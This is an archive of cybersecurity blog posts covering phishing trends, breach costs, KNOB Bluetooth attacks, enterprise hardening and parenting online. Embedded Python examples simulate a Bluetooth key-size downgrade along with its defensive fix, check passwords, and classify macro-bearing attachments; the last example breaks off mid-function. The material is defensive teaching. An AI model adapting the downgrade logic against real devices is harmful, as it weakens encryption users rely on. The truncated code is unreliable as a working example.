Category Archives: Cybersecurity

Quantum computing: The new moonshot in the cyber space race

In 2016, China launched Micius, the world’s first quantum communications enabled satellite. For some, that launch eerily echoed the launch of the Soviet Union’s Sputnik satellite in 1957, which caught the United States off guard and spurred a decades-long contest to regain and maintain global technological and military supremacy. The parallel wasn’t lost on the Chinese. Jian-Wei Pan, the lead researcher on the Micius project, hailed the start of “a worldwide quantum space race.” Indeed, … More

The post Quantum computing: The new moonshot in the cyber space race appeared first on Help Net Security.

Facebook phishing surges, Microsoft still most impersonated brand

Vade Secure published the results of its Phishers’ Favorites report for Q2 2019. According to the report, which ranks the 25 most impersonated brands in phishing attacks, Microsoft was by far the top target for the fifth straight quarter. There was also a significant uptick in Facebook phishing, as the social media giant moved up to the third spot on the list as a result of a staggering 176 percent YoY growth in phishing URLs. … More

The post Facebook phishing surges, Microsoft still most impersonated brand appeared first on Help Net Security.

The transformation of enterprise security from 2017 to 2019

Estimated reading time: 2 minutes

The nature of enterprise security is such that it continuously keeps evolving. Trends change, threats vary and morph into different entities, and approaches that seem relevant get outdated in six months or sometimes even less. For enterprises looking to stay ahead of the curve when it comes to cybersecurity, staying stagnant is not an option. The need of the hour is to keep abreast of the latest trends and technologies to stay safe.

Thanks to the speed of transformation, enterprise security has seen multifold changes in the last two years, some due to need and some due to necessity. These changes can be summed up through the following pointers:

A move towards a zero-trust network

More and more organizations are moving towards a zero-trust model where no one and nothing is trusted by default. Introduced by the American market research giant Forrester Research, the zero-trust network model eliminates the concept of a perimeter and calls for enterprises to inspect all network traffic without any classification of ‘internal’ and ‘external’. Basically, no user or traffic is considered ‘authorized’ up front, and all access to a specific network is governed by the same set of rules.

The evolution from 4G to 5G

In 2017, enterprise security needed to understand 4G – now, network technology has evolved to such an extent that the world is embracing 5G. It is a trend which enterprises must also embrace but at the same time, be aware of the security tradeoffs. As with the advent of any new technology, cybercriminals will also join the bandwagon to ensure they create chaos and profit. 5G will likely have different types of phones, different networks and a completely different kind of technology which will open up new vulnerabilities – early adopters should be extremely careful.

The rise of cryptojacking

An important trend which has caught the industry’s attention is the dangerous threat of cryptojacking. This is a threat which will only become more widespread as the usage of cryptocurrency increases. It works by hackers sending targeted emails with malicious code in them to unsuspecting users, or by embedding this code into sketchy websites. The attack succeeds if the malicious code is executed by an unsuspecting user: it then works in the background, silently mining cryptocurrency. This takes up a lot of computer resources and can often lead to slow system performance.

Spear phishing

While phishing is a tactic that continues to be used, it has an upgraded, even more dangerous avatar, popularly known as spear phishing. In spear phishing, users get meticulously personalized emails that appear to come from a trusted source or a company they’re familiar with and interact with quite often. This could be as convincing as an email from a friend, colleague or your boss asking you for access to classified information. Attackers are now closely examining their targets and gathering as much information about them as they can to ensure their email is as believable as possible. This is done by deploying Advanced Persistent Threats (APTs) against entire systems, gathering humongous amounts of data about enterprise and customer habits, and then using this data to launch a spear-phishing campaign.

Certainly, enterprise security has seen a lot of changes in the last two years which is a natural state of affairs in this sector. It is important for enterprises to invest in solutions which continue to evolve and stay attuned to the latest cybersecurity trends to ensure they are not lagging behind. Seqrite’s range of enterprise security solutions is continuously updated to enable enterprises to remain safe from the ever-evolving threats in today’s digital age.

The post The transformation of enterprise security from 2017 to 2019 appeared first on Seqrite Blog.

Unlocking the future of blockchain innovation with privacy-preserving technologies

The origins of blockchain as many are familiar with it today can be traced back to the Bitcoin whitepaper, first published in 2008 by Satoshi Nakamoto, which offered a vision of a new financial system underscored by cryptography and trust in code. Throughout the past decade, iterations of this technological infrastructure have gradually built out a diverse industry ecosystem, allowing for use cases that extend beyond cryptocurrencies and peer-to-peer transactions. From smart contracts to asset … More

The post Unlocking the future of blockchain innovation with privacy-preserving technologies appeared first on Help Net Security.

From SmarterChild to Siri: Why AI is the competitive advantage securing businesses

The dream of an AI-influenced world is finally here. After decades of writing about it, AI has reached a point where it’s ingrained into our daily lives. From the days of SmarterChild – for many, the AIM messenger bot was the first foray into AI – to now the ubiquitous presence of the AI-enabled digital assistant such as Siri, the vision of artificial intelligence transforming from sci-fi to reality has come to fruition. But instead … More

The post From SmarterChild to Siri: Why AI is the competitive advantage securing businesses appeared first on Help Net Security.

Identifying evasive threats hiding inside the network

There is no greater security risk to an organization than a threat actor that knows how to operate under the radar. Malicious insiders and external cybercriminals are getting savvier. They are better at blending in without tripping any alerts. They skip over tools and techniques that trigger standard security systems. How can a company tell them apart from the noise created by legitimate logins to the network that day? The answer lies in context. It … More

The post Identifying evasive threats hiding inside the network appeared first on Help Net Security.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas. But what is the cost of dealing with an attack in these four industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

How Your Company Can Prevent a Cyberattack

Capital One’s announcement of a hack that affected more than 100 million people should have you asking not what, but who’s in your wallet. The company estimated a year-one expense ranging from $100-$150 million. Equifax settled recently on a penalty of more than $700 million. Getting cyber wrong is expensive.

Getting cyber wrong–i.e., all the ways that can become manifest–is of course also complex. There will soon be more than 30 billion connected devices “out there” in consumer hands, on their wrists, in their laps, cars, kitchens, walls, and, yes, at work–in short, IoT is everywhere, and our connectables almost always go with us.

Okay, so the obvious metaphor everyone is used to is the vectors of a virus on the move. The president catches a bug in North Korea, and next thing you know everyone at Mar-a-Lago has it. Rachel Maddow catches a cold while fly-fishing on the Housatonic, and next thing you know the whole Democratic establishment has it. Bob from accounting goes on vacation with his laptop, and the next thing you know, millions of customers get hacked.

Bob, you’re fired.

It’s All About Attackable Surface

Tortoises have cyber down pat, both for real and metaphorically. Ever heard about a tortoise getting hacked? The reason you haven’t is because there’s nothing to get.

Tortoises have no finances and, taken as a genus, they rarely have names and social media accounts. When they do have names and Instagram accounts, there’s a hackable human somewhere nearby. Tortoises are not the problem.

If only our employees had the cyber equivalent of what tortoises have. What’s not to like about having a hard shell? Better, what about one into which one can retract all their vulnerable areas? They also move slowly, which in fable allowed at least one of them to beat a hare in a foot race. Among other things, this slowness means fewer clicked links in phishing emails.

Tortoises have a lot of what it takes to be cybersafe–though admittedly in an environment where things have to get done, often quickly, they don’t make the most attractive choice for corporate spirit animal.

Cyber Is a Marathon, Not a Sprint

So, the order of the day is for sure not something like, “Consumers and businesses alike: Be the tortoise!” Not quite. The turtle is to the cybersecurity of your enterprise what campaign slogans like “Make America Great Again” or “Yes We Can” are to the country. I mean, let’s face it, tortoises are not renowned for their earning capacity. That said, they can be inspirational–or at least aspirational. They can help us think about what good cyber looks like.

My marketing department would do a facepalm if I were to recommend courses that you can offer employees to improve their cybersecurity practices, because I own a company that is dedicated to helping companies and individuals stay as safe as possible in our current state of persistent threat. That said, there are some guiding principles of cybersecurity, particularly in the workplace, that I will share with you. They are at the bedrock of our practice, because they work.

Choices? There’s Really Only One

There is a critical mass of options out there for cybersecurity employee training, online and otherwise. By now, we should expect to be seeing puppet shows on the dangers of phishing.

All that aside, the best solution is free. It is creating a culture of cyber threat awareness and best practices. As Peter Drucker once said, “Culture eats strategy for breakfast.”

While I am only going to name one here, there are programs–both for-profit and public advocacy based–that help small and medium-sized businesses learn to be safer and more secure. A non-profit called the National Cyber Security Alliance offers a series of in-person, highly interactive and easy-to-understand workshops based on the National Institute of Standards and Technology (NIST) Cybersecurity Framework.

For-profit choices are legion. They may offer continuous training programs to help thwart phishing attacks and malware infections. There may be modules to go through for employees, or PowerPoint courses, or quizzes. Other programs cover specific topics, like how to navigate the web without picking up a virus, how to recognize social engineering (a fancy term for the hacking practice of luring in unsuspecting victims with links and offers of this or that slice of paradise), safe mobile practice, safe travel practices, safe email practice, and much more.

Other companies offer training courses as part of the onboarding process, and it should go without saying that at this point in the story arc of cyber insecurity, any enterprise that doesn’t secure employee devices during the onboarding process is courting disaster.

Cybersecurity Is Not a Spectacle Sport

Whether you send daily (or weekly) emails listing the latest threats or you talk about it at all-in meetings, cyber needs to be a part of everyday life to keep your enterprise as safe as possible.

The basic tasks that need to be accomplished:

1. Phish-proof your employees. Teach employees how to recognize phishing attacks, and what happens when they occur.

2. Foster good end-user practices. Make sure employees know what good password practices look like. Talk about computer-hygiene practices, and commonsense defenses against the threat of insider attacks.

3. Change management. Change fosters insecurity, and that’s when we’re most vulnerable to attack. Teach employees how to manage cyber during enterprise-wide change.

And then there is the more technical stuff for your CISO, whether that person is in-house or subcontracted. Don’t have anyone playing this role? Figure it out by Monday.

All of the above is fine and good, but I think principles–creating a culture of cyber awareness–is generally more effective, which is why I favor cyber training that is aimed at minimizing, monitoring, and managing cyber risk.

While there are many products and classes out there, and many of them are no doubt workable solutions, here’s the basics of a cultural (and free) approach:

Minimize exposure.

Employees should never authenticate themselves to anyone unless they are in control of the interaction. Oversharing on social media expands one’s attackable surface. Be a good steward of passwords, safeguard any documents that can be used to hack an account or workstation, and in general stay vigilant. Attacks happen. All the time.

Monitor accounts.

A compromised employee can lead to a compromised company. One way your employees can make sure they haven’t been personally compromised is to check their credit reports religiously, keep track of their credit score, and review major accounts daily. Transaction alerts from financial services institutions and credit card companies can help. Your human resources department may want to explore the possibility of offering a credit and identity monitoring program to employees as an added benefit.

Manage the damage.

When something happens, get on top of it quickly and/or get help from professionals who can help navigate and resolve the situation–whatever it is.

Slow and steady wins this seemingly unwinnable race. Sound paradoxical? It is. Cyber security is a practice, not a product. There is no one way to solve the cybersecurity quagmire, but there are very established routes through it, and you owe it to your company to learn them and teach them to everyone you work with.

The post How Your Company Can Prevent a Cyberattack appeared first on Adam Levin.

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.
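The weakness described above is a negotiation problem, not a cipher problem: two devices agree on how long the encryption key will be, and a device that is willing to accept a one-byte key will accept one whether or not the other side really asked for it. The toy model below is an added example (not code from the McAfee post and not a real Bluetooth stack) that simulates the key-size exchange between two devices, an in-range party rewriting the size field, and the defensive check that closes the gap: refusing any negotiated size below a configured minimum. The simplified accept/counter rules and the 7-byte minimum used in the demonstration are assumptions chosen for illustration.

```python
"""Toy model of Bluetooth BR/EDR encryption key-size negotiation.

Added example, not the original post's code or a real Bluetooth stack.
Each device proposes the largest key size it supports and accepts any
size at or above its own configured minimum. Sizes are in bytes, 1..16.
Assumption: the simple accept/counter rule below stands in for the real
message flow; it is enough to show why a minimum size matters.
"""
from dataclasses import dataclass
from typing import Callable, Optional

MAX_KEY_BYTES = 16


@dataclass
class Device:
    name: str
    max_key: int = MAX_KEY_BYTES
    min_key: int = 1  # historic behaviour: any size down to one byte is accepted

    def propose(self) -> int:
        """First message: ask for the largest key we support."""
        return self.max_key

    def respond(self, proposed: int) -> Optional[int]:
        """Accept the smaller of the proposal and our own maximum, unless
        that falls below our minimum, in which case refuse the connection."""
        size = min(proposed, self.max_key)
        return size if size >= self.min_key else None


Tamper = Optional[Callable[[int], int]]


def negotiate(a: Device, b: Device, tamper: Tamper = None) -> Optional[int]:
    """Run the exchange A -> B -> A and return the agreed size, or None if
    either side refuses. `tamper` models a party in radio range rewriting
    the size field in flight; None means an honest channel."""
    proposal = a.propose()
    if tamper is not None:
        proposal = tamper(proposal)  # A's proposal as B actually sees it
    counter = b.respond(proposal)
    if counter is None:
        return None
    if tamper is not None:
        counter = tamper(counter)  # B's reply as A actually sees it
    return a.respond(counter)


def key_space(key_bytes: int) -> int:
    """Number of possible keys for a given size; 1 byte gives only 256."""
    return 2 ** (8 * key_bytes)


if __name__ == "__main__":
    force_one_byte = lambda _size: 1  # the rewrite the post describes

    honest = negotiate(Device("phone"), Device("car"))
    print(f"honest channel: {honest} bytes, key space {key_space(honest)}")

    forced = negotiate(Device("phone"), Device("car"), tamper=force_one_byte)
    print(f"tampered, no minimum: {forced} byte, key space {key_space(forced)}")

    # Defensive policy: either side refusing sizes below 7 bytes (assumed
    # threshold) turns the downgrade into a failed connection instead.
    hardened = negotiate(Device("phone", min_key=7), Device("car", min_key=7),
                         tamper=force_one_byte)
    print(f"tampered, 7-byte minimum on both sides: {hardened}")
```

Running it shows the honest exchange settling on 16 bytes, the tampered exchange settling on 1 byte (a key space of 256), and the tampered exchange being refused as soon as one of the two devices enforces a minimum; that is what a firmware or OS patch for this class of issue does, and why the "turn on automatic updates" tip below is the durable fix rather than simply not sharing sensitive data.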

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

Analytics 101

From today’s smart home applications to autonomous vehicles of the future, the efficiency of automated decision-making is becoming widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have been realized; however, it is important to understand that these terms are not interchangeable but evolve in complexity and knowledge to drive better decisions.

Distinguishing Between Machine Learning, Deep Learning and Artificial Intelligence

Put simply, analytics is the scientific process of transforming data into insight for making better decisions. Within the world of cybersecurity, this definition can be expanded to mean the collection and interpretation of security event data from multiple sources, and in different formats for identifying threat characteristics.

Simple explanations for each are as follows:

  • Machine Learning: Automated analytics that learn over time, recognizing patterns in data.  Key for cybersecurity because of the volume and velocity of Big Data.
  • Deep Learning: Uses many layers of input and output nodes (similar to brain neurons), with the ability to learn.  Typically makes use of the automation of Machine Learning.
  • Artificial Intelligence: The most complex and intelligent analytical technology, as a self-learning system applying complex algorithms which mimic human-brain processes such as anticipation, decision making, reasoning, and problem solving.

Benefits of Analytics within Cybersecurity

Big Data, the term coined in October 1997, is ubiquitous in cybersecurity as the volume, velocity and veracity of threats continue to explode. Security teams are overwhelmed by the immense volume of intelligence they must sift through to protect their environments from cyber threats. Analytics expand the capabilities of humans by sifting through enormous quantities of data and presenting it as actionable intelligence.

While the technologies must be used strategically and can be applied differently depending upon the problem at hand, here are some scenarios where human-machine teaming of analysts and analytic technologies can make all the difference:

  • Identify hidden malware with Machine Learning: Machine Learning algorithms recognize patterns far more quickly than your average human. This pattern recognition can detect behaviors that cause security breaches, whether known or unknown, periodically “learning” to become smarter. Machine Learning can be descriptive, diagnostic, predictive, or prescriptive in its analytic assessments, but typically is diagnostic and/or predictive in nature.
  • Defend against new threats with Deep Learning: Complex and multi-dimensional, Deep Learning reflects similar multi-faceted security behaviors in its actual algorithms; if the situation is complex, the algorithm is likely to be complex. It can detect, protect, and correct old or new threats by learning what is reasonable within any environment and identifying outliers and unique relationships.  Deep Learning can be descriptive, diagnostic, predictive, and prescriptive as well.
  • Anticipate threats with Artificial Intelligence: Artificial Intelligence uses reason and logic to understand its ecosystem. Like a human brain, AI considers value judgements and outcomes in determining good or bad, right or wrong.  It utilizes a number of complex analytics, including Deep Learning and Natural Language Processing (NLP). While Machine Learning and Deep Learning can span descriptive to prescriptive analytics, AI is extremely good at the more mature analytics of predictive and prescriptive.

With any security solution, therefore, it is important to identify the use case and ask “what problem are you trying to solve” to select Machine Learning, Deep Learning, or Artificial Intelligence analytics.  In fact, sometimes a combination of these approaches is required, like many McAfee products including McAfee Investigator.  Human-machine teaming as well as a layered approach to security can further help to detect, protect, and correct the most simple or complex of breaches, providing a complete solution for customers’ needs.

The post Analytics 101 appeared first on McAfee Blogs.

Digital Parenting: How to Keep the Peace with Your Kids Online

Simply by downloading the right combination of apps, parents can now track their child’s location 24/7, monitor their social conversations, and inject their thoughts into their lives in a split second. To a parent, that’s called safety. To kids, it’s considered maddening.

Kids are making it clear that parents armed with apps are overstepping their roles in many ways. And parents, concerned about the risks online, are making it clear they aren’t about to let their kids run wild.

I recently watched the relationship of a mother and her 16-year-old daughter fall apart over the course of a year. When the daughter got her driver’s license (along with her first boyfriend), the mother started tracking her daughter’s location with the Life360 app to ease her mind. However, the more she tracked, the more the confrontations escalated. Eventually, the daughter, feeling penned in, waged a full-blown rebellion that is still going strong.

There’s no perfect way to parent, especially in the digital space. There are, however, a few ways that might help us drive our digital lanes more efficiently and keep the peace. But first, we may need to curb (or ‘chill out on’ as my kids put it) some annoying behaviors we may have picked up along the way.

Here are just a few ways to keep the peace and avoid colliding with your kids online:

Interact with care on their social media. It’s not personal. It’s human nature. Kids (tweens and teens) don’t want to hang out with their parents in public — that especially applies online. They also usually aren’t too crazy about you connecting with their friends online. And tagging your tween or teen in photos? Yeah, that’s taboo. Tip: If you need to comment on a photo (be it positive or negative) do it in person or with a direct message, not under the floodlights of social media. This is simply respecting your child’s social boundaries. 

Ask before you share pictures. Most parents think posting pictures of their kids online is a simple expression of love or pride, but to kids, it can be extremely embarrassing, and even an invasion of privacy. Tip: Be discerning about how much you post about your kids online and what you post. Junior may not think a baby picture of him potty training is so cute. Go the extra step and ask your child’s permission before posting a photo of them.

Keep tracking and monitoring in check. Just because you have the means to monitor your kids 24/7 doesn’t mean you should. It’s wise to know where your child goes online (and off), but when that action slips into a preoccupation, it can wreck a relationship (it’s also exhausting). The fact that some kids make poor digital choices doesn’t mean your child will. If your fears about the online world and assumptions about your child’s behavior have led you to obsessively track their location, monitor their conversations, and hover online, it may be time to re-engineer your approach. Tip: Put the relationship with your child first. Invest as much time into talking to your kids and spending one-on-one time with them as you do tracking them. Put conversation before control so that you can parent from confidence, rather than fear.

Avoid interfering in conflicts. Kids will be bullied, meet people who don’t like them and go through tough situations. Keeping kids safe online can be done with wise, respectful monitoring. However, that monitoring can slip into lawnmower parenting (mowing over any obstacle that gets in a child’s path) as described in this viral essay. Tip: Don’t block your child’s path to becoming a capable adult. Unless there’s a serious issue to your child’s health and safety, try to stay out of his or her online conflicts. Keep it on your radar but let it play out. Allow your child to deal with peers, feel pain, and find solutions. 

As parents, we’re all trying to find the balance between allowing kids to have their space online and still keeping them safe. Too much tracking can cause serious family strife, while too little can be inattentive in light of the risks. Parenting today is a difficult road that’s always a work in progress, so give yourself permission to keep learning and improving your process along the way.

The post Digital Parenting: How to Keep the Peace with Your Kids Online appeared first on McAfee Blogs.

Essential practices to strengthen your business’ cybersecurity

Estimated reading time: 4 minutes

With enterprises being the centre of attention of an ever-evolving threat landscape, foolproof security of business assets has become the need of the hour. To counter the menace of cyberattacks, today we have businesses that specialize in the development and deployment of advanced and futuristic solutions that have the capability to defend businesses from the most dangerous of malware.

However, this vigilance may falter if enterprise stakeholders are not cautious about the basics of cybersecurity. Every critical aspect, such as email, user access and software updates, needs to be optimized so that even a worst-case cyberattack scenario turns in the business’ favour.

Seqrite intends to educate its esteemed customers about very simple but effective steps that organizations need to integrate into their status quo to bolster cybersecurity.

Regular data backups

Data backups are essential because ransomware is notorious for encrypting enterprise data and demanding payment in exchange for its release. Other malware can also wipe out 100% of a business’s critical data.

Hence –

  • Back up your important data regularly and keep a recent backup copy offline
  • Encrypt your backups
  • Always use a combination of online and offline backups
  • If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed
  • Do not keep offline backups connected to your system, as that data could be encrypted when ransomware strikes
  • Periodically test restoring from a backup; a backup that has never been restored is an assumption, not a control

Access rights

Administrators should exercise extreme caution when granting rights to the workforce. Access rights must be assigned precisely: admins should have absolute clarity about which parts of the business each user needs to reach, and grant no more than that (the principle of least privilege).

Hence –

  • Regularly audit local/domain users and remove or disable accounts that are no longer needed
  • Set strong passwords for every business account. A strong password includes a combination of:
    • Upper-case letters
    • Lower-case letters
    • Numbers and special characters
    • A minimum of 8-10 characters
  • Mandate a password change on a periodic basis (note that current NIST guidance, SP 800-63B, recommends forcing a change only when there is evidence of compromise, and favours length and screening against known-breached passwords over scheduled rotation)
  • Common passwords such as P@ssw0rd or Admin@123# satisfy the complexity rules above and are still bad examples: they are in every attacker’s wordlist
  • Set password expiration and account lockout policies (lock the account after a number of consecutive wrong passwords)
  • Don’t assign administrator privileges to ordinary users
  • If possible, enable multi-factor authentication to ensure all logins are legitimate
  • Don’t stay logged in as an administrator unless it is strictly necessary
  • Avoid browsing, opening documents or other regular work activities while logged in as an administrator
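One way to enforce these rules, as an added example (this is not Seqrite’s code, and the word lists are constructed samples), is a small checker that applies the length and character-class rules and then normalizes the password before a dictionary check. The point it demonstrates is that P@ssw0rd and Admin@123# satisfy every complexity rule above and are rejected only by the dictionary check:

```python
import re
from typing import List

# Added example, not Seqrite's code: enforce the password rules listed above and
# show why a complexity rule on its own is not enough. The word lists are
# constructed samples; in production screen against a large breached-password list.
MIN_LENGTH = 8  # the page says 8-10; the lower bound is used here
CLASSES = {
    "upper-case letter": re.compile(r"[A-Z]"),
    "lower-case letter": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "special character": re.compile(r"[^A-Za-z0-9]"),
}
# Base words that attackers try first, in every case and leetspeak variant.
COMMON_BASE_WORDS = {"password", "admin", "welcome", "qwerty", "letmein"}
# Common leetspeak substitutions, undone before the dictionary check.
LEET = str.maketrans("@$0134", "asoiea")


def normalize(password: str) -> str:
    """Reduce a password to its base word: lower-case it, drop the trailing run of
    digits/symbols (the '@123#' in 'Admin@123#') and undo leetspeak ('P@ssw0rd')."""
    base = re.sub(r"[^a-z]+$", "", password.lower())
    return base.translate(LEET)


def check_password(password: str) -> List[str]:
    """Return the list of rule violations; an empty list means the password is accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for name, pattern in CLASSES.items():
        if not pattern.search(password):
            problems.append(f"missing {name}")
    # The complexity rules above are satisfied by 'P@ssw0rd'; only this check rejects it.
    if normalize(password) in COMMON_BASE_WORDS:
        problems.append("based on a common dictionary word")
    return problems


if __name__ == "__main__":
    for candidate in ["P@ssw0rd", "Admin@123#", "Tr0ub4dor&3xplorer", "Ab1!"]:
        print(f"{candidate!r}: {check_password(candidate) or 'OK'}")
```

Run it and the two bad examples from the list fail only the last check, which is why a breached-password denylist (and an MFA requirement) does more for you than a rotation schedule.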

Software updates

Software updates deliver the latest bug fixes and security patches to every piece of software in your business.

Hence –

  • Keep your operating system and other software updated. Software updates frequently include patches for newly discovered security vulnerabilities that attackers exploit. Apply patches and updates for software like Microsoft Office, Java, Adobe Reader, Flash, and browsers like Internet Explorer, Chrome, Firefox, Opera, etc., including browser plugins
  • Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware
  • Do not download cracked/pirated software; it is a common vector for backdoors and other malware
  • Avoid downloading software from untrusted P2P or torrent sites. In most cases, they harbour malicious software

Securing network and shared folders

Typically, network and shared folders hold the most confidential business data. Attackers are always on the prowl to break into these folders and reach highly sensitive information, and ransomware in particular enumerates and encrypts every writable share it can reach.

Hence –

  • Use strong and unique passwords for login accounts and network shares
  • Disable unnecessary administrative shares (ADMIN$, C$ and the like) and grant access to shared data strictly on a need-to-know basis
  • Audit RDP access and disable it if not required; otherwise allow it only from specific, intended systems and require Network Level Authentication
  • Changing the RDP port to a non-standard one reduces noise from automated scanners but is not a security control on its own; the firewall rules and VPN below are what actually limit exposure
  • Configure the firewall as follows:
    • Deny all access to important ports (in this case RDP port 3389)
    • Allow access only from IP addresses under your control
  • Use a VPN to access the network instead of exposing RDP to the Internet
  • Implement two-factor authentication (2FA) wherever possible
  • Set a lockout policy that hinders credential guessing
  • Create a separate network folder for each user when managing access to shared network folders
  • Don’t keep software on writable shares in executable form; a compromised host can replace an installer or tool that everyone runs with a trojanised copy

Email

No business can function without email, and history shows that email is one of the go-to channels attackers use to launch cyber attacks.

Hence –

  • Enable Multi-Factor authentication to ensure all logins are legitimate
  • Set password expiration & account lockout policies (in case the wrong password is entered)
  • Don’t open attachments and links in an email sent by an unknown, unexpected or unwanted source. Delete suspicious-looking emails you receive from unknown sources, especially if they contain links or attachments
  • Cybercriminals use ‘Social Engineering’ techniques to trick users into opening attachments or clicking on links that lead to infected websites
  • Always turn on email protection of your antivirus software

Disable macros for Microsoft Office

Fairly self-explanatory: macros should be disabled by default because a great deal of malware gains its foothold by persuading the user to enable them.

Hence –

  • Do not enable ‘macros’ or ‘editing mode’ by default when opening a document, especially attachments received via email. A lot of malware infections rely on you turning on macros
  • Consider installing Microsoft Office Viewers. These viewer applications let you see what documents look like without opening them in Word or Excel, and the viewers don’t support macros at all, which removes the risk of enabling macros unintentionally. Note that Microsoft has since retired the standalone viewers; in current Office versions, Protected View and the Group Policy setting “Block macros from running in Office files from the Internet” provide the same protection and can be enforced centrally
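An added example, not Seqrite’s code, of what a mail gateway or a scripted attachment triage can do with the macro advice above: decide from the file’s bytes, not its extension, whether an Office attachment carries a VBA project. The sample documents are constructed in memory; the OLE header constant and the vbaProject.bin part name are real Office conventions, while the file names are made up:

```python
import io
import zipfile

# Added example, not Seqrite's code: classify an Office attachment by content rather
# than file extension. OLE_MAGIC is the header of the legacy binary .doc/.xls container.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def classify_attachment(data: bytes) -> str:
    """Return 'macro', 'clean', 'legacy-binary' or 'not-office' for the raw bytes of
    an attachment. Modern Office files are ZIP packages; a VBA project is stored as a
    vbaProject.bin part and declared in [Content_Types].xml, so either is a giveaway."""
    if data.startswith(OLE_MAGIC):
        # Legacy .doc/.xls/.ppt. Macros live inside OLE storages that need a dedicated
        # parser (the oletools project, for instance); a gateway that cannot inspect
        # them should quarantine rather than trust them.
        return "legacy-binary"
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return "not-office"
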